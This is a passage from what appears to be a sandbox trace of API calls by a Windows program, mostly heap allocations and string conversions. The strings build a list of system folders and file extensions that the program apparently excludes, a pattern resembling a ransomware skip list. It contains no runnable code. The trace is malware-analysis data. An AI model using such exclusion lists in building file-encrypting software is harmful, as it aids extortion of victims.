dwFlags=0x0, lpMem=0x2aa91d8 | out: hHeap=0x670000) returned 1 [0100.745] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x20) returned 0x2b31928 [0100.745] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x20) returned 0x2b31950 [0100.745] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b31950 | out: hHeap=0x670000) returned 1 [0100.745] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b31928 | out: hHeap=0x670000) returned 1 [0100.745] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x81e) returned 0x2b3a470 [0100.746] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18ea50, cbMultiByte=-1, lpWideCharStr=0x2b3a470, cchWideChar=1039 | out: lpWideCharStr="ntuser.dat.LOG2") returned 16 [0100.746] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x820) returned 0x2b3b4c0 [0100.746] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b3a470 | out: hHeap=0x670000) returned 1 [0100.746] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x48) returned 0x2ade830 [0100.746] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2afe190 | out: hHeap=0x670000) returned 1 [0100.746] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x20) returned 0x2b31928 [0100.746] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x20) returned 0x2b31950 [0100.747] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b31950 | out: hHeap=0x670000) returned 1 [0100.747] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b31928 | out: hHeap=0x670000) returned 1 [0100.747] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x814) returned 0x2b39428 [0100.747] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18ea50, cbMultiByte=-1, lpWideCharStr=0x2b39428, cchWideChar=1034 | out: lpWideCharStr="ntuser.pol") returned 11 [0100.747] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x820) returned 0x2b3a470 [0100.747] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b39428 | out: hHeap=0x670000) returned 1 [0100.747] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x60) returned 0x2ad1d98 [0100.748] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2ade830 | out: hHeap=0x670000) returned 1 [0100.748] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x20) returned 0x2b31928 [0100.748] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x20) returned 0x2b31950 [0100.748] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b31950 | out: hHeap=0x670000) returned 1 [0100.748] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b31928 | out: hHeap=0x670000) returned 1 [0100.749] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x808) returned 0x2b39428 [0100.749] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18ea50, cbMultiByte=-1, lpWideCharStr=0x2b39428, cchWideChar=1028 | out: lpWideCharStr=".sys") returned 5 [0100.749] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x810) returned 0x2b3bce8 [0100.749] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b39428 | out: hHeap=0x670000) returned 1 [0100.749] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x90) returned 0x2a97820 [0100.749] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2ad1d98 | out: hHeap=0x670000) returned 1 [0100.749] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x20) returned 0x2b31928 [0100.749] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x20) returned 0x2b31950 [0100.750] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b31950 | out: hHeap=0x670000) returned 1 [0100.750] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b31928 | out: hHeap=0x670000) returned 1 [0100.750] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x808) returned 0x2b39428 [0100.750] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18ea50, cbMultiByte=-1, lpWideCharStr=0x2b39428, cchWideChar=1028 | out: lpWideCharStr=".ini") returned 5 [0100.750] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x810) returned 0x2b3c500 [0100.751] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b39428 | out: hHeap=0x670000) returned 1 [0100.751] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x20) returned 0x2b31928 [0100.751] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x20) returned 0x2b31950 [0100.751] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b31950 | out: hHeap=0x670000) returned 1 [0100.751] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b31928 | out: hHeap=0x670000) returned 1 [0100.751] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x808) returned 0x2b39428 [0100.751] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18ea50, cbMultiByte=-1, lpWideCharStr=0x2b39428, cchWideChar=1028 | out: lpWideCharStr=".DLL") returned 5 [0100.751] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x810) returned 0x2b3cd18 [0100.752] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b39428 | out: hHeap=0x670000) returned 1 [0100.764] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0xd8) returned 0x731f88 [0100.765] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2a97820 | out: hHeap=0x670000) returned 1 [0100.765] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x20) returned 0x2b31928 [0100.765] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x20) returned 0x2b31950 [0100.765] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b31950 | out: hHeap=0x670000) returned 1 [0100.766] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b31928 | out: hHeap=0x670000) returned 1 [0100.766] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x808) returned 0x2b39428 [0100.766] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18ea50, cbMultiByte=-1, lpWideCharStr=0x2b39428, cchWideChar=1028 | out: lpWideCharStr=".dll") returned 5 [0100.766] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x810) returned 0x2b3d530 [0100.767] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b39428 | out: hHeap=0x670000) returned 1 [0100.767] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x20) returned 0x2b31928 [0100.767] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x20) returned 0x2b31950 [0100.767] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b31950 | out: hHeap=0x670000) returned 1 [0100.768] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b31928 | out: hHeap=0x670000) returned 1 [0100.768] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x808) returned 0x2b39428 [0100.768] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18ea50, cbMultiByte=-1, lpWideCharStr=0x2b39428, cchWideChar=1028 | out: lpWideCharStr=".blf") returned 5 [0100.768] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x810) returned 0x2b3dd48 [0100.769] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b39428 | out: hHeap=0x670000) returned 1 [0100.769] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x20) returned 0x2b31928 [0100.769] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x20) returned 0x2b31950 [0100.769] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b31950 | out: hHeap=0x670000) returned 1 [0100.769] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b31928 | out: hHeap=0x670000) returned 1 [0100.769] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x808) returned 0x2b39428 [0100.770] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18ea50, cbMultiByte=-1, lpWideCharStr=0x2b39428, cchWideChar=1028 | out: lpWideCharStr=".bat") returned 5 [0100.770] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x810) returned 0x2b3e560 [0100.770] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b39428 | out: hHeap=0x670000) returned 1 [0100.770] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x138) returned 0x2aaf940 [0100.770] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x731f88 | out: hHeap=0x670000) returned 1 [0100.770] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x20) returned 0x2b31928 [0100.771] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x20) returned 0x2b31950 [0100.771] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b31950 | out: hHeap=0x670000) returned 1 [0100.772] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b31928 | out: hHeap=0x670000) returned 1 [0100.772] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x808) returned 0x2b39428 [0100.772] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18ea50, cbMultiByte=-1, lpWideCharStr=0x2b39428, cchWideChar=1028 | out: lpWideCharStr=".lnk") returned 5 [0100.772] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x810) returned 0x2b3ed78 [0100.772] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b39428 | out: hHeap=0x670000) returned 1 [0100.772] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x20) returned 0x2b31928 [0100.772] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x20) returned 0x2b31950 [0100.773] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b31950 | out: hHeap=0x670000) returned 1 [0100.773] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b31928 | out: hHeap=0x670000) returned 1 [0100.773] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x818) returned 0x2b39428 [0100.773] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18ea50, cbMultiByte=-1, lpWideCharStr=0x2b39428, cchWideChar=1036 | out: lpWideCharStr=".regtrans-ms") returned 13 [0100.773] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x820) returned 0x2b3f590 [0100.773] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b39428 | out: hHeap=0x670000) returned 1 [0100.774] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x20) returned 0x2b31928 [0100.774] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x20) returned 0x2b31950 [0100.774] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b31950 | out: hHeap=0x670000) returned 1 [0100.774] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b31928 | out: hHeap=0x670000) returned 1 [0100.774] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x818) returned 0x2b39428 [0100.774] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18ea50, cbMultiByte=-1, lpWideCharStr=0x2b39428, cchWideChar=1036 | out: lpWideCharStr="C:\\SystemID\\") returned 13 [0100.774] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x820) returned 0x2b3fdb8 [0100.775] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b39428 | out: hHeap=0x670000) returned 1 [0100.775] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x20) returned 0x2b31928 [0100.775] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x20) returned 0x2b31950 [0100.775] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b31950 | out: hHeap=0x670000) returned 1 [0100.775] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b31928 | out: hHeap=0x670000) returned 1 [0100.775] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x20) returned 0x2b31928 [0100.775] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x82c) returned 0x2b405e0 [0100.775] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2b31928, cbMultiByte=-1, lpWideCharStr=0x2b405e0, cchWideChar=1046 | out: lpWideCharStr="C:\\Users\\Default User\\") returned 23 [0100.776] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x830) returned 0x2b40e18 [0100.776] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b405e0 | out: hHeap=0x670000) returned 1 [0100.787] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b31928 | out: hHeap=0x670000) returned 1 [0100.787] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x1c8) returned 0x2aee6d8 [0100.788] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2aaf940 | out: hHeap=0x670000) returned 1 [0100.788] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x20) returned 0x2b31928 [0100.788] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x20) returned 0x2b31950 [0100.788] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b31950 | out: hHeap=0x670000) returned 1 [0100.789] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b31928 | out: hHeap=0x670000) returned 1 [0100.789] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x20) returned 0x2b31928 [0100.789] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x820) returned 0x2b405e0 [0100.789] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2b31928, cbMultiByte=-1, lpWideCharStr=0x2b405e0, cchWideChar=1040 | out: lpWideCharStr="C:\\Users\\Public\\") returned 17 [0100.789] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x830) returned 0x2b41650 [0100.789] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b405e0 | out: hHeap=0x670000) returned 1 [0100.790] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b31928 | out: hHeap=0x670000) returned 1 [0100.790] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x20) returned 0x2b31928 [0100.790] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x20) returned 0x2b31950 [0100.790] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b31950 | out: hHeap=0x670000) returned 1 [0100.791] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b31928 | out: hHeap=0x670000) returned 1 [0100.791] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x20) returned 0x2b31928 [0100.791] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x826) returned 0x2b405e0 [0100.791] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2b31928, cbMultiByte=-1, lpWideCharStr=0x2b405e0, cchWideChar=1043 | out: lpWideCharStr="C:\\Users\\All Users\\") returned 20 [0100.791] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x830) returned 0x2b41e88 [0100.791] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b405e0 | out: hHeap=0x670000) returned 1 [0100.792] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b31928 | out: hHeap=0x670000) returned 1 [0100.792] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x20) returned 0x2b31928 [0100.792] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x20) returned 0x2b31950 [0100.792] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b31950 | out: hHeap=0x670000) returned 1 [0100.792] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b31928 | out: hHeap=0x670000) returned 1 [0100.792] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x20) returned 0x2b31928 [0100.792] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x822) returned 0x2b405e0 [0100.793] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2b31928, cbMultiByte=-1, lpWideCharStr=0x2b405e0, cchWideChar=1041 | out: lpWideCharStr="C:\\Users\\Default\\") returned 18 [0100.793] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x830) returned 0x2b426c0 [0100.793] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b405e0 | out: hHeap=0x670000) returned 1 [0100.793] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b31928 | out: hHeap=0x670000) returned 1 [0100.793] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x20) returned 0x2b31928 [0100.793] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x20) returned 0x2b31950 [0100.794] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b31950 | out: hHeap=0x670000) returned 1 [0100.794] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b31928 | out: hHeap=0x670000) returned 1 [0100.794] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x20) returned 0x2b31928 [0100.794] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x834) returned 0x2b42ef8 [0100.794] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2b31928, cbMultiByte=-1, lpWideCharStr=0x2b42ef8, cchWideChar=1050 | out: lpWideCharStr="C:\\Documents and Settings\\") returned 27 [0100.794] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x840) returned 0x2b43738 [0100.795] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b42ef8 | out: hHeap=0x670000) returned 1 [0100.795] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b31928 | out: hHeap=0x670000) returned 1 [0100.795] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x20) returned 0x2b31928 [0100.795] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x20) returned 0x2b31950 [0100.795] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b31950 | out: hHeap=0x670000) returned 1 [0100.796] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b31928 | out: hHeap=0x670000) returned 1 [0100.796] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x81e) returned 0x2b405e0 [0100.796] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18ea50, cbMultiByte=-1, lpWideCharStr=0x2b405e0, cchWideChar=1039 | out: lpWideCharStr="C:\\ProgramData\\") returned 16 [0100.796] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x820) returned 0x2b42ef8 [0100.796] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b405e0 | out: hHeap=0x670000) returned 1 [0100.796] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x20) returned 0x2b31928 [0100.796] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x20) returned 0x2b31950 [0100.797] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b31950 | out: hHeap=0x670000) returned 1 [0100.797] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b31928 | out: hHeap=0x670000) returned 1 [0100.797] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x818) returned 0x2b39428 [0100.797] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18ea50, cbMultiByte=-1, lpWideCharStr=0x2b39428, cchWideChar=1036 | out: lpWideCharStr="C:\\Recovery\\") returned 13 [0100.797] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x820) returned 0x2b405e0 [0100.797] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b39428 | out: hHeap=0x670000) returned 1 [0100.797] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x2a0) returned 0x2b249b0 [0100.798] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2aee6d8 | out: hHeap=0x670000) returned 1 [0100.798] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x20) returned 0x2b31928 [0100.798] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x20) returned 0x2b31950 [0100.798] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b31950 | out: hHeap=0x670000) returned 1 [0100.799] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b31928 | out: hHeap=0x670000) returned 1 [0100.799] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x20) returned 0x2b31928 [0100.799] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x83a) returned 0x2b43f80 [0100.799] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2b31928, cbMultiByte=-1, lpWideCharStr=0x2b43f80, cchWideChar=1053 | out: lpWideCharStr="C:\\System Volume Information\\") returned 30 [0100.799] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x840) returned 0x2b447c8 [0100.799] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b43f80 | out: hHeap=0x670000) returned 1 [0100.800] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b31928 | out: hHeap=0x670000) returned 1 [0100.800] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x20) returned 0x2b31928 [0100.800] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x20) returned 0x2b31950 [0100.800] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b31950 | out: hHeap=0x670000) returned 1 [0100.801] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b31928 | out: hHeap=0x670000) returned 1 [0100.801] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x30) returned 0x2afe190 [0100.801] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x848) returned 0x2b45010 [0100.801] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2afe190, cbMultiByte=-1, lpWideCharStr=0x2b45010, cchWideChar=1060 | out: lpWideCharStr="C:\\Users\\%username%\\AppData\\Roaming\\") returned 37 [0100.801] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x850) returned 0x2b45860 [0100.801] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b45010 | out: hHeap=0x670000) returned 1 [0100.802] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2afe190 | out: hHeap=0x670000) returned 1 [0100.802] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x20) returned 0x2b31928 [0100.802] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x20) returned 0x2b31950 [0100.819] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b31950 | out: hHeap=0x670000) returned 1 [0100.819] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b31928 | out: hHeap=0x670000) returned 1 [0100.819] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x30) returned 0x2afe190 [0100.819] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x844) returned 0x2b45010 [0100.820] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2afe190, cbMultiByte=-1, lpWideCharStr=0x2b45010, cchWideChar=1058 | out: lpWideCharStr="C:\\Users\\%username%\\AppData\\Local\\") returned 35 [0100.820] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x850) returned 0x2b460b8 [0100.820] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b45010 | out: hHeap=0x670000) returned 1 [0100.820] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2afe190 | out: hHeap=0x670000) returned 1 [0100.821] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x20) returned 0x2b31928 [0100.821] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x20) returned 0x2b31950 [0100.821] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b31950 | out: hHeap=0x670000) returned 1 [0100.821] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b31928 | out: hHeap=0x670000) returned 1 [0100.821] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x816) returned 0x2b39428 [0100.821] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18ea50, cbMultiByte=-1, lpWideCharStr=0x2b39428, cchWideChar=1035 | out: lpWideCharStr="C:\\Windows\\") returned 12 [0100.821] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x820) returned 0x2b43f80 [0100.822] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b39428 | out: hHeap=0x670000) returned 1 [0100.822] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x20) returned 0x2b31928 [0100.822] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x20) returned 0x2b31950 [0100.822] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b31950 | out: hHeap=0x670000) returned 1 [0100.822] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b31928 | out: hHeap=0x670000) returned 1 [0100.822] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x818) returned 0x2b39428 [0100.822] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18ea50, cbMultiByte=-1, lpWideCharStr=0x2b39428, cchWideChar=1036 | out: lpWideCharStr="C:\\PerfLogs\\") returned 13 [0100.822] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x820) returned 0x2b45010 [0100.823] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b39428 | out: hHeap=0x670000) returned 1 [0100.823] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x20) returned 0x2b31928 [0100.823] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x20) returned 0x2b31950 [0100.823] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b31950 | out: hHeap=0x670000) returned 1 [0100.824] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b31928 | out: hHeap=0x670000) returned 1 [0100.824] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x20) returned 0x2b31928 [0100.824] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x832) returned 0x2b46910 [0100.824] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2b31928, cbMultiByte=-1, lpWideCharStr=0x2b46910, cchWideChar=1049 | out: lpWideCharStr="C:\\ProgramData\\Microsoft\\") returned 26 [0100.824] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x840) returned 0x2b47150 [0100.825] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b46910 | out: hHeap=0x670000) returned 1 [0100.825] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b31928 | out: hHeap=0x670000) returned 1 [0100.825] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x20) returned 0x2b31928 [0100.825] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x20) returned 0x2b31950 [0100.825] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b31950 | out: hHeap=0x670000) returned 1 [0100.826] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b31928 | out: hHeap=0x670000) returned 1 [0100.826] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x20) returned 0x2b31928 [0100.826] RtlAllocateHeap (HeapHandle=0x670000, 